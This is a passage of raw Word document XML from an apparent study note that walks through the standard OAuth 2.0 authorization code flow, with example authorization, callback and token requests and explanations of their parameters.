          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30615D8D" wp14:editId="6FB99E35">
            <wp:extent cx="6643322" cy="412073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8957" cy="4167652"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66519B16" w14:textId="77777777" w:rsidR="00E92AFE" w:rsidRPr="008026BD" w:rsidRDefault="00E92AFE"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1. Authorization request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82D0A7" w14:textId="77777777" w:rsidR="008C41DB" w:rsidRPr="008026BD" w:rsidRDefault="008C41DB" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>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GET /authorization?</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client_id</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=12345&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=https://client-app.com/callback&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>response_type</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=code&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=openid%20profile&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=ae13d489bd00e3c24 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E691EE0" w14:textId="0060D0F9" w:rsidR="008C41DB" w:rsidRPr="008026BD" w:rsidRDefault="008C41DB" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host: oauth-authorization-server.com</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2505A1" w14:textId="2AAD3947" w:rsidR="00E92AFE" w:rsidRPr="008026BD" w:rsidRDefault="00E92AFE" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>client_id</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>: of the client application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E9709" w14:textId="13E3AE03" w:rsidR="00E92AFE" w:rsidRPr="008026BD" w:rsidRDefault="00E92AFE" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>authorization code will be sent back to this URI</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F662E76" w14:textId="6E572A22" w:rsidR="00E92AFE" w:rsidRPr="008026BD" w:rsidRDefault="00E92AFE" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>response_type</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>: “code” for authorization code grant type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D368042" w14:textId="2776219A" w:rsidR="00E92AFE" w:rsidRPr="008026BD" w:rsidRDefault="00E92AFE" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>: kind of a CSRF token</w:t>
      </w:r>
      <w:r w:rsidR="003E416C" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the session</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>. The Oauth service should return this value</w:t>
      </w:r>
      <w:r w:rsidR="003E416C" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> in reponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B64F3C" w14:textId="77777777" w:rsidR="00E541E4" w:rsidRPr="008026BD" w:rsidRDefault="00E541E4"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lastRenderedPageBreak/>
        <w:t>2. User login and consent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE58C2" w14:textId="61BF96AC" w:rsidR="00E541E4" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the first time, the user </w:t>
      </w:r>
      <w:r w:rsidR="00E541E4" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E541E4" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manually log in and give their consent</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. B</w:t>
      </w:r>
      <w:r w:rsidR="00E541E4" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ut if they revisit the client application, </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>those steps will be completed automatically if their session with the OAuth service is still valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0AB88" w14:textId="77777777" w:rsidR="00EB1C66" w:rsidRPr="008026BD" w:rsidRDefault="00EB1C66" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388641E5" w14:textId="77777777" w:rsidR="00EB1C66" w:rsidRPr="008026BD" w:rsidRDefault="00EB1C66"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3. Authorization code grant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43112E95" w14:textId="77777777" w:rsidR="003E416C" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>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GET /callback?</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=a1b2c3d4e5f6g7h8&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=ae13d489bd00e3c24 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B87E2" w14:textId="34377687" w:rsidR="003E416C" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>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Host: client-app.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAEA90" w14:textId="77777777" w:rsidR="003E416C" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377C793D" w14:textId="1837D3D3" w:rsidR="00EB1C66" w:rsidRPr="008026BD" w:rsidRDefault="00EB1C66"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4. Access token request</w:t>
      </w:r>
      <w:r w:rsidR="00020AC2" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in back-channel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31115807" w14:textId="77777777" w:rsidR="003E416C" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>POST /token HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016AC31D" w14:textId="77777777" w:rsidR="003E416C" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Host: oauth-authorization-server.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CBD658" w14:textId="77777777" w:rsidR="003E416C" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC91425" w14:textId="631DA94C" w:rsidR="003E416C" w:rsidRPr="008026BD" w:rsidRDefault="003E416C" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>client_id</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=12345&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>client_secret</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=SECRET&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
